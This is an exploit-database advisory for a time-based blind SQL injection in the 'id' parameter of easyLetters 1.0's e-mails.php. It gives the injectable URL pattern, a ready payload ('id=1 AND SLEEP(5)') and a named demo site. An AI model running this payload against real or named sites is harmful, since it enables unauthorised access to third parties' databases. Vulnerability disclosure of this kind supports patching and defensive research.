id: 30496
date: 05/29/2018
title: easyLetters 1.0 - (id) SQL Injection Vulnerability
author: AkkuS
cves: 

# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
====================================================
# Demo : http://pauloreg.com/newsletter/
# PoC : SQLi :
 
http://test.com/newsletter/e-mails.php?id=[SQLi]
 
Parameter: id (GET)
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)
 
====================================================

#  0day.today [2023-03-22]  #